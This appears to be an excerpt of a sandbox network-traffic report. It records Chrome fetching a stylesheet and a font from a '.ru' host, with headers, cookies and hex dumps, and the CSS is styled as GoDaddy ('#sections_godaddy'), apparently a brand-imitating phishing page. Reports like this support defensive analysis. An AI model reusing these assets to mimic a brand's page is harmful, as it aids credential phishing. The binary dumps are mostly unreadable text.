                                                31192.168.2.449780188.114.96.34434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:21:10 UTC1354OUTGET /abD8xmKpqXe3def25 HTTP/1.1
                                                Host: f8gxf.oritelos.ru
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: text/css,*/*;q=0.1
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: style
                                                Referer: https://f8gxf.oritelos.ru/zyuqihsbghvajrlrrrPCNEXHOWHPJFXHPQVJEVEUXA?hotpuoxsczupfqtsqmzqgeWLKVDKPOARASQVVG
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: XSRF-TOKEN=eyJpdiI6IlpUZEJnMmZFenQ3WnRjNEYxL2o5NFE9PSIsInZhbHVlIjoicnJ5MWJ1cDgyNmxySWhLa2FsUExWak1tbDcxTnh5VGVreGxLd3p5b2pONDg4TWVYbVN3Y2FNTFRUdnl5bnBMeFFWdHMzbUNrK25MZFNnOEJOYkZNU21iMU5ndmNGS09wd1dNRzJodVFDRU5ENUFNS0t6MEtjVVJ3aWRJZlJRamkiLCJtYWMiOiIyMTk1NjM3ZjRjYjhjZWM5NmM1Y2MyZTVjYmUzOTUyMjMyZDcyNWNhNDhhYjI0MjExYjcxZmYzNjY5ZTk5ZGQ2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImlYYmdra3Z4VnJhdWhNYkpGaFhBR2c9PSIsInZhbHVlIjoiakFpOXhEd2pkUS9tZ2UvemdLTUJLQXphNEZsak5hVks5SkcrY0xrUldEOFBORkV3SHJDOVNJZ3BSZ2E5T2FVSmc5YW1IV3B2U3N0cGloUnloTXJkRXJuaGQ4a050SkVHUHYrSG1ZaUhLVFByY1ZSYmdhNjd2bVJmUzFiSkR4WmsiLCJtYWMiOiJmYTJkN2YwNjRlNmVjZWUyNTgzZjFhM2QyYTNiYjBmNTZjM2QwOGE1OWZkYzYxMWFiMWFiZGVmMGNiMTAzMTkyIiwidGFnIjoiIn0%3D
                                                2024-05-30 10:21:10 UTC631INHTTP/1.1 200 OK
                                                Date: Thu, 30 May 2024 10:21:10 GMT
                                                Content-Type: text/css;charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Content-Disposition: inline; filename="abD8xmKpqXe3def25"
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mzq%2B9NFGHYS4Gq%2Fi%2FBZGoYSAlUNmFt1IVjpErWW1Rdx2cIiItEWUMXdfXnmbUXrwIfTdSgR6HtmWCYxueXSLnjOmfWpkFW%2BHoMdyJgdnQULGJ86Wr4hKFDfpFV2nZQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                alt-svc: h3=":443"; ma=86400
                                                Server: cloudflare
                                                CF-RAY: 88bdfeea791818a1-EWR
                                                2024-05-30 10:21:10 UTC738INData Raw: 33 37 62 39 0d 0a 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 67 64 73 68 65 72 70 61 27 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 73 72 63 3a 20 75 72 6c 28 27 2f 77 65 62 38 2f 61 73 73 65 74 73 2f 66 6f 6e 74 73 2f 47 44 53 68 65 72 70 61 2d 62 6f 6c 64 2e 77 6f 66 66 32 27 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 2c 75 72 6c 28 27 2f 77 65 62 38 2f 61 73 73 65 74 73 2f 66 6f 6e 74 73 2f 47 44 53 68 65 72 70 61 2d 62 6f 6c 64 2e 77 6f 66 66 27 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 27 29 3b 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 2d 31 30 46 46 46 46 3b 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 7d 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20
                                                Data Ascii: 37b9@font-face{font-family: 'gdsherpa';font-weight: 700;src: url('/web8/assets/fonts/GDSherpa-bold.woff2') format('woff2'),url('/web8/assets/fonts/GDSherpa-bold.woff') format('woff');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family:
                                                2024-05-30 10:21:10 UTC1369INData Raw: 77 65 69 67 68 74 3a 20 31 20 39 30 30 3b 73 72 63 3a 20 75 72 6c 28 27 2f 77 65 62 38 2f 61 73 73 65 74 73 2f 66 6f 6e 74 73 2f 47 44 53 68 65 72 70 61 2d 76 66 32 2e 77 6f 66 66 32 27 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 2c 75 72 6c 28 27 2f 77 65 62 38 2f 61 73 73 65 74 73 2f 66 6f 6e 74 73 2f 47 44 53 68 65 72 70 61 2d 76 66 32 2e 77 6f 66 66 32 27 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 2d 76 61 72 69 61 74 69 6f 6e 73 27 29 3b 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 2d 31 30 46 46 46 46 3b 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 7d 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 67 64 2d 73 61 67 65 27 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 73 72 63 3a 20 75
                                                Data Ascii: weight: 1 900;src: url('/web8/assets/fonts/GDSherpa-vf2.woff2') format('woff2'),url('/web8/assets/fonts/GDSherpa-vf2.woff2') format('woff2-variations');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gd-sage';font-weight: 700;src: u
                                                2024-05-30 10:21:10 UTC1369INData Raw: 31 2e 35 65 6d 29 20 2f 20 32 29 3b 0d 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 76 61 72 28 2d 2d 75 78 2d 31 66 37 69 66 35 70 2c 75 6e 64 65 72 6c 69 6e 65 29 3b 0d 0a 20 20 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 76 61 72 28 2d 2d 75 78 2d 31 66 37 69 66 35 70 2c 75 6e 64 65 72 6c 69 6e 65 29 3b 0d 0a 20 20 67 61 70 3a 20 30 2e 35 65 6d 3b 0d 0a 20 20 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0d 0a 20 20 2d 2d 75 78 2d 62 75 74 74 6f 6e 2d 69 63 6f 6e 2d 6d 61 72 67 69 6e 3a 20 63 61 6c 63 28 28 76 61 72 28 2d 2d 75 78 2d 74 33 37 39 6f 76 2c 76 61 72 28 2d 2d 75 78 2d 6a 77 35 73 39 6a 2c 31 2e 35 29 29 20 2a 20 31 65 6d 20 2d 20 31 2e 35 65 6d 29
                                                Data Ascii: 1.5em) / 2); padding: 0; text-decoration: var(--ux-1f7if5p,underline); -webkit-text-decoration: var(--ux-1f7if5p,underline); gap: 0.5em; cursor: pointer; --ux-button-icon-margin: calc((var(--ux-t379ov,var(--ux-jw5s9j,1.5)) * 1em - 1.5em)
                                                2024-05-30 10:21:10 UTC1369INData Raw: 2d 73 69 7a 65 29 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 73 70 61 63 65 2e 75 78 2d 73 70 61 63 65 2d 2d 62 6c 6f 63 6b 3a 65 6d 70 74 79 20 7b 0d 0a 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 66 6c 65 78 3b 0d 0a 20 20 62 6c 6f 63 6b 2d 73 69 7a 65 3a 20 76 61 72 28 2d 2d 75 78 53 70 61 63 65 2d 2d 70 61 64 64 69 6e 67 2d 73 69 7a 65 29 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 73 70 61 63 65 2e 75 78 2d 73 70 61 63 65 2d 2d 62 6c 6f 63 6b 3a 6e 6f 74 28 3a 65 6d 70 74 79 29 20 7b 0d 0a 20 20 70 61 64 64 69 6e 67 2d 62 6c 6f 63 6b 3a 20 76 61 72 28 2d 2d 75 78 53 70 61 63 65 2d 2d 70 61 64 64 69 6e 67 2d 73 69 7a 65 29 3b 0d 0a 7d 0d 0a 0d 0a 23
                                                Data Ascii: -size);}#sections_godaddy .ux-space.ux-space--block:empty { display: inline-flex; block-size: var(--uxSpace--padding-size);}#sections_godaddy .ux-space.ux-space--block:not(:empty) { padding-block: var(--uxSpace--padding-size);}#
                                                2024-05-30 10:21:10 UTC1369INData Raw: 70 33 76 2c 31 2e 31 32 35 29 29 3b 0d 0a 20 20 2d 2d 75 78 54 65 78 74 2d 2d 66 6f 6e 74 53 69 7a 65 33 3a 20 63 61 6c 63 28 76 61 72 28 2d 2d 75 78 54 65 78 74 2d 2d 66 6f 6e 74 53 69 7a 65 32 29 20 76 61 72 28 2d 2d 75 78 2d 79 34 70 67 38 7a 2c 2a 29 20 76 61 72 28 2d 2d 75 78 2d 37 73 34 70 33 76 2c 31 2e 31 32 35 29 29 3b 0d 0a 20 20 2d 2d 75 78 54 65 78 74 2d 2d 66 6f 6e 74 53 69 7a 65 34 3a 20 63 61 6c 63 28 76 61 72 28 2d 2d 75 78 54 65 78 74 2d 2d 66 6f 6e 74 53 69 7a 65 33 29 20 76 61 72 28 2d 2d 75 78 2d 79 34 70 67 38 7a 2c 2a 29 20 76 61 72 28 2d 2d 75 78 2d 37 73 34 70 33 76 2c 31 2e 31 32 35 29 29 3b 0d 0a 20 20 2d 2d 75 78 54 65 78 74 2d 2d 66 6f 6e 74 53 69 7a 65 35 3a 20 63 61 6c 63 28 76 61 72 28 2d 2d 75 78 54 65 78 74 2d 2d 66 6f 6e
                                                Data Ascii: p3v,1.125)); --uxText--fontSize3: calc(var(--uxText--fontSize2) var(--ux-y4pg8z,*) var(--ux-7s4p3v,1.125)); --uxText--fontSize4: calc(var(--uxText--fontSize3) var(--ux-y4pg8z,*) var(--ux-7s4p3v,1.125)); --uxText--fontSize5: calc(var(--uxText--fon
                                                2024-05-30 10:21:10 UTC1369INData Raw: 6f 6c 6f 72 3a 20 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 0d 0a 20 20 66 69 6c 6c 3a 20 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 74 65 78 74 2d 69 6e 70 75 74 2d 73 68 65 6c 6c 20 2e 75 78 2d 74 65 78 74 2d 63 61 70 74 69 6f 6e 20 7b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 36 70 78 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 33 70 78 3b 0d 0a 7d 0d 0a 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 66 69 65 6c 64 2d 66 72 61 6d 65 2e 75 78 2d 66 69 65 6c 64 2d 66 72 61 6d 65 2d 2d 69 6e 76 61 6c 69 64 20 7b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 44 42 31 38 30 32 20 21 69 6d 70 6f 72 74 61 6e
                                                Data Ascii: olor: currentColor; fill: currentColor;}#sections_godaddy .ux-text-input-shell .ux-text-caption { margin-top: 6px; font-size: 13px;}#sections_godaddy .ux-field-frame.ux-field-frame--invalid { border-color: #DB1802 !importan
                                                2024-05-30 10:21:10 UTC1369INData Raw: 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 73 72 2d 6f 6e 6c 79 20 7b 0d 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 77 69 64 74 68 3a 20 31 70 78 3b 0d 0a 20 20 68 65 69 67 68 74 3a 20 31 70 78 3b 0d 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0d 0a 20 20 2d 77 65 62 6b 69 74 2d 63 6c 69 70 3a 20 72 65 63 74 28 30 2c 30 2c 30 2c 30 29 3b 0d 0a 20 20 63 6c 69 70 3a 20 72 65 63 74 28 30 2c 30 2c 30 2c 30 29 3b 0d 0a 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 0d 0a 20 20 2d 77 65 62 6b 69 74 2d 63 6c 69 70 2d 70 61 74 68 3a 20 69 6e 73 65 74 28 35 30 25 29 3b 0d 0a 20 20 63 6c 69 70 2d 70 61 74 68 3a 20 69 6e 73 65 74 28 35 30 25 29 3b 0d
                                                Data Ascii: tions_godaddy .sr-only { position: absolute; width: 1px; height: 1px; padding: 0; overflow: hidden; -webkit-clip: rect(0,0,0,0); clip: rect(0,0,0,0); white-space: nowrap; -webkit-clip-path: inset(50%); clip-path: inset(50%);
                                                2024-05-30 10:21:10 UTC1369INData Raw: 64 65 72 2d 62 6f 78 3b 0d 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 2e 30 39 33 37 35 72 65 6d 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 38 70 78 3b 0d 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 38 70 78 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 63 6f 6e 74 61 69 6e 65 72 3a 3a 61 66 74 65 72 20 7b 0d 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 22 3b 0d 0a 20 20 64 69 73 70 6c 61 79 3a 20 74 61
                                                Data Ascii: der-box; padding: 0; vertical-align: .09375rem;}#sections_godaddy .container { margin-left: auto; margin-right: auto; padding-left: 8px; padding-right: 8px;}#sections_godaddy .container::after { content: ""; display: ta
                                                2024-05-30 10:21:10 UTC1369INData Raw: 31 70 78 20 73 6f 6c 69 64 20 76 61 72 28 2d 2d 75 78 2d 39 37 68 33 76 6c 2c 23 64 33 64 33 64 33 29 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 63 61 72 64 20 2e 63 61 72 64 2d 62 6c 6f 63 6b 20 7b 0d 0a 20 20 70 61 64 64 69 6e 67 3a 20 63 61 6c 63 28 76 61 72 28 2d 2d 75 78 2d 31 73 62 66 69 67 38 2c 2e 32 35 72 65 6d 29 20 2a 20 35 29 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 66 6f 6e 74 2d 70 72 69 6d 61 72 79 2d 62 6f 6c 64 20 7b 0d 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 61 72 28 2d 2d 75 78 2d 31 30 36 37 70 68 39 2c 73 61 6e 73 2d 73 65 72 69 66 29 3b 0d 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 65 72 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65
                                                Data Ascii: 1px solid var(--ux-97h3vl,#d3d3d3);}#sections_godaddy .ux-card .card-block { padding: calc(var(--ux-1sbfig8,.25rem) * 5);}#sections_godaddy .font-primary-bold { font-family: var(--ux-1067ph9,sans-serif); font-weight: bolder;}#se
                                                2024-05-30 10:21:10 UTC1369INData Raw: 68 2c 76 61 72 28 2d 2d 75 78 2d 39 71 70 66 36 63 2c 23 30 30 66 29 29 3b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 75 78 2d 75 71 34 39 70 67 2c 76 61 72 28 2d 2d 75 78 2d 68 36 65 37 63 31 2c 23 66 66 66 29 29 3b 0d 0a 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 75 78 2d 34 68 76 6f 76 6e 2c 76 61 72 28 2d 2d 75 78 2d 31 78 6c 69 75 68 69 2c 74 72 61 6e 73 70 61 72 65 6e 74 29 29 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 62 75 74 74 6f 6e 2e 75 78 2d 62 75 74 74 6f 6e 2d 70 72 69 6d 61 72 79 20 7b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0d 0a 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a
                                                Data Ascii: h,var(--ux-9qpf6c,#00f)); color: var(--ux-uq49pg,var(--ux-h6e7c1,#fff)); border-color: var(--ux-4hvovn,var(--ux-1xliuhi,transparent));}#sections_godaddy .ux-button.ux-button-primary { color: #fff; background-color: #000; border-color:


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                32192.168.2.449782188.114.96.34434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:21:10 UTC1379OUTGET /pqOKTFEEmnh8egHBG34r6Zuv40 HTTP/1.1
                                                Host: f8gxf.oritelos.ru
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                Origin: https://f8gxf.oritelos.ru
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: */*
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: font
                                                Referer: https://f8gxf.oritelos.ru/zyuqihsbghvajrlrrrPCNEXHOWHPJFXHPQVJEVEUXA?hotpuoxsczupfqtsqmzqgeWLKVDKPOARASQVVG
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: XSRF-TOKEN=eyJpdiI6IlpUZEJnMmZFenQ3WnRjNEYxL2o5NFE9PSIsInZhbHVlIjoicnJ5MWJ1cDgyNmxySWhLa2FsUExWak1tbDcxTnh5VGVreGxLd3p5b2pONDg4TWVYbVN3Y2FNTFRUdnl5bnBMeFFWdHMzbUNrK25MZFNnOEJOYkZNU21iMU5ndmNGS09wd1dNRzJodVFDRU5ENUFNS0t6MEtjVVJ3aWRJZlJRamkiLCJtYWMiOiIyMTk1NjM3ZjRjYjhjZWM5NmM1Y2MyZTVjYmUzOTUyMjMyZDcyNWNhNDhhYjI0MjExYjcxZmYzNjY5ZTk5ZGQ2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImlYYmdra3Z4VnJhdWhNYkpGaFhBR2c9PSIsInZhbHVlIjoiakFpOXhEd2pkUS9tZ2UvemdLTUJLQXphNEZsak5hVks5SkcrY0xrUldEOFBORkV3SHJDOVNJZ3BSZ2E5T2FVSmc5YW1IV3B2U3N0cGloUnloTXJkRXJuaGQ4a050SkVHUHYrSG1ZaUhLVFByY1ZSYmdhNjd2bVJmUzFiSkR4WmsiLCJtYWMiOiJmYTJkN2YwNjRlNmVjZWUyNTgzZjFhM2QyYTNiYjBmNTZjM2QwOGE1OWZkYzYxMWFiMWFiZGVmMGNiMTAzMTkyIiwidGFnIjoiIn0%3D
                                                2024-05-30 10:21:10 UTC635INHTTP/1.1 200 OK
                                                Date: Thu, 30 May 2024 10:21:10 GMT
                                                Content-Type: font/woff2
                                                Content-Length: 28000
                                                Connection: close
                                                Content-Disposition: inline; filename="pqOKTFEEmnh8egHBG34r6Zuv40"
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UAaxY8tAbLsp7mWctUp%2BLCvb5LhwN2gqXu%2FrooQ%2BMs0HU4Ij6JosGIma%2Fkg1o6f%2BJwN2NRDnUd00W4MTJcsTS6HOAw68%2B%2BxEHRmO%2Bnssy3zPhnN7Ei%2BYE9zgENXt%2BA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                alt-svc: h3=":443"; ma=86400
                                                Server: cloudflare
                                                CF-RAY: 88bdfeea8f614217-EWR
                                                2024-05-30 10:21:10 UTC734INData Raw: 77 4f 46 32 00 01 00 00 00 00 6d 60 00 10 00 00 00 01 24 08 00 00 6c fd 00 01 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 81 9d 36 1c 89 16 06 60 00 8e 3c 08 3c 09 97 62 11 08 0a 82 bb 24 82 9c 7f 01 36 02 24 03 8e 78 0b 87 3e 00 04 20 05 8c 03 07 97 7b 0c 81 0d 5b 09 10 71 05 6b b7 5d 5d 4f 88 db 06 10 73 b3 fd a9 7c 99 02 6e 8c 9b c7 21 18 d6 5b 3c 3b 10 83 ee e0 50 26 a6 cf 67 ff ff ff bf 21 a9 c8 98 49 27 69 b7 0d 51 01 44 50 d5 df 9f c4 1e 39 02 92 4a a0 06 b7 80 17 c1 39 47 eb 95 e9 98 51 31 28 8b f2 29 4a 6e c6 19 d5 d4 c5 d4 38 59 f3 d2 1b f9 1a 98 29 4a ce 46 0e 63 20 41 96 af 37 6b ab 76 b3 8b e9 32 3d a1 5a ee 6e fa 34 60 12 ed 81 a0 c0 7e 4e 6c a4 81 ef 34 3b aa 91 07 53 f6 6c 7b 77 c7 c7 3a ae 23 d5 ee aa 3d 21 bc 20
                                                Data Ascii: wOF2m`$lB6`<<b$6$x> {[qk]]Os|n![<;P&g!I'iQDP9J9GQ1()Jn8Y)JFc A7kv2=Zn4`~Nl4;Sl{w:#=!
                                                2024-05-30 10:21:10 UTC1369INData Raw: b3 00 da 3c c0 dd 43 06 78 fd fb cf db e5 9f fb 06 4b 68 b0 50 00 7c 22 4d 93 ae 4a 51 a6 00 02 1a e0 df 3f 60 01 fc 53 40 7b df ed 6f 97 f6 52 6a 43 45 a1 71 78 8f 70 92 21 28 57 69 9f a4 1b eb 64 59 b5 25 ff 2f 72 f2 23 13 70 04 e7 43 20 15 c4 93 e2 e9 00 00 81 82 83 f3 72 1e 6f 34 50 f1 7d e4 e6 7f 33 58 92 99 5d 88 fc f3 a2 d4 ae 01 36 f2 9e 27 7e 26 b0 d3 c0 5d b7 b4 a7 2a 79 09 f4 8f b6 ff 59 51 82 a7 39 e1 22 76 b7 c3 17 cb 33 f0 af 90 a0 d9 6f 45 4d 51 6f 57 4d 16 57 60 cc 85 de 1f 9a 8a 01 13 c4 07 db cc a4 0e 94 94 10 82 59 08 56 81 8a 4f 32 11 7f ee f1 f8 f4 6c 83 02 c7 ac 9d 70 01 31 87 f4 42 a5 c2 bf 46 6e 0e 7f 6f 10 3c d0 ab a8 2c 43 8f f7 0f fd 97 f8 5e c0 59 e6 43 00 b6 fe 57 ae e9 b6 74 58 e2 11 7c a8 60 d2 a6 bc 97 35 3a f7 59 64 40 5d
                                                Data Ascii: <CxKhP|"MJQ?`S@{oRjCEqxp!(WidY%/r#pC ro4P}3X]6'~&]*yYQ9"v3oEMQoWMW`YVO2lp1BFno<,C^YCWtX|`5:Yd@]
                                                2024-05-30 10:21:10 UTC1369INData Raw: 41 e4 02 85 1c 3a 5e 35 01 24 1a 4e 4a ad 68 65 68 64 9a cf 32 9d 4d e7 8a 0a 96 48 c8 6c 22 d8 b5 a2 1b ed 62 bc b1 36 52 21 05 95 14 c7 81 94 35 dc bc 61 7e c1 b4 7a 90 11 b4 ca 1d 10 b9 22 0a 08 40 c0 9b 31 90 dc 27 05 17 40 40 05 00 50 85 55 b6 46 4e 76 17 a1 cf f8 91 28 18 bc 86 dd 28 8a 0d 6e 1d 26 6e 7d 95 e8 90 58 8c 91 02 38 4a a0 94 87 e5 5a 50 e2 4c bc d0 25 06 2b 80 8c c4 05 99 9c 71 86 d8 29 ca 83 fb a6 88 8f df 77 45 f5 08 aa 72 b3 dd 04 90 49 e7 01 a0 73 40 15 14 14 29 cb f1 82 58 04 82 31 5a 02 29 dc 92 31 91 53 51 02 a6 fa 29 2a 80 d8 45 b8 e5 49 0f 90 d8 00 4a f9 09 a8 6e 75 4c 81 89 2f 00 77 7d b0 d2 75 b4 ea 9a ae 67 98 3e 3c 14 be 13 55 48 55 f9 1e 60 2e ed fc 69 cf da b5 42 06 20 96 20 07 60 a8 05 c2 4c f9 e3 9b e0 38 ab d1 83 9b 3a
                                                Data Ascii: A:^5$NJhehd2MHl"b6R!5a~z"@1'@@PUFNv((n&n}X8JZPL%+q)wErIs@)X1Z)1SQ)*EIJnuL/w}ug><UHU`.iB `L8:
                                                2024-05-30 10:21:10 UTC1369INData Raw: 5d b7 91 70 f5 9e ee e7 df 29 84 2f 8d 21 bc 9b c0 9e 39 aa 76 68 dd 8c 5b 2f 6b 9f 1d b3 c9 cf 85 80 7e 4d 7d 1c 44 b5 56 8e d5 c6 7d 25 c4 02 3b 1b 15 6b 50 8d 7e cb ba 24 26 a5 bb 63 d1 11 53 27 2b df 09 8c 31 2c f4 05 2d 8e 9d 58 08 42 45 de 45 e3 4e a2 83 07 5d cd 4a 33 e0 b5 97 e1 ae c5 ad d6 f0 84 e2 b0 3c c6 03 e7 41 3f 7a 78 70 cc 8c 76 2e 02 cf b0 85 b1 bb 8b 6f c8 80 02 d5 9e 4a 0a a0 e3 4b b7 9b 9f c2 a6 10 af 98 9a 67 7a 8f e4 ad 45 d1 58 cc 2e ad 55 97 e2 39 c3 32 ea cd 24 ff 27 7b 73 5b b5 87 25 e3 73 aa 4d 39 f0 18 1c e6 1b 82 af d3 ba d2 3c 76 ce 79 bf b0 50 9d c3 58 69 34 3f af 43 4d 37 3b 6c 0d ce 6f 77 95 ec 53 d8 54 86 b1 6d 91 2a 74 76 a0 4a b1 bf 18 8f 94 7e cf d7 cf f4 a0 5e 55 14 0e 79 da 72 32 2d 41 57 0e 69 b4 3f 77 7c c5 7f e3
                                                Data Ascii: ]p)/!9vh[/k~M}DV}%;kP~$&cS'+1,-XBEEN]J3<A?zxpv.oJKgzEX.U92$'{s[%sM9<vyPXi4?CM7;lowSTm*tvJ~^Uyr2-AWi?w|
                                                2024-05-30 10:21:10 UTC1369INData Raw: ad 04 7f 09 46 25 d3 e1 09 ae 2d cf 99 80 54 9b eb 9f 00 6a 07 4d d1 ff 28 8b fc 6c d2 51 9d 0e 83 9d 22 5c e7 48 fc 92 05 99 2d cc c3 68 90 eb c1 5c 1c b1 24 18 71 2e 08 a3 6c db c7 5b cb 58 47 63 ba 7c 3d 91 9d bf 11 44 11 fd a1 6b 70 7b ee c6 de 50 49 44 db ef aa dc 2c 43 d6 77 cc 1f aa ac 43 7b cb 87 68 e6 c2 24 ef 71 39 38 ea ca 50 a1 dd a1 b9 16 af e7 5b 36 1a a3 68 7d b7 d1 9b 19 9e 1c 5e da b3 75 d6 19 24 b3 60 d0 95 e7 b7 0d b0 2c 6e a1 9e a0 81 cf 5d 0e 63 53 f1 46 00 2f bb fe 1f 70 a5 9e 58 1d 8b e9 75 3b 36 ba 42 6c 18 29 19 db c5 7e 29 4e 35 47 ef 03 d3 11 c4 6b cc 5c b2 8c 98 87 f1 b4 13 7a 4a eb 68 53 1d d1 cd 11 38 50 f8 a2 27 ad a6 67 78 4b 59 17 a6 07 71 e0 18 1c 10 0b 1d 4d 5f a1 68 c3 41 66 ce 84 77 dd 8c a7 e9 0d 2d 3e d3 90 90 f7 e2
                                                Data Ascii: F%-TjM(lQ"\H-h\$q.l[XGc|=Dkp{PID,CwC{h$q98P[6h}^u$`,n]cSF/pXu;6Bl)~)N5Gk\zJhS8P'gxKYqM_hAfw->
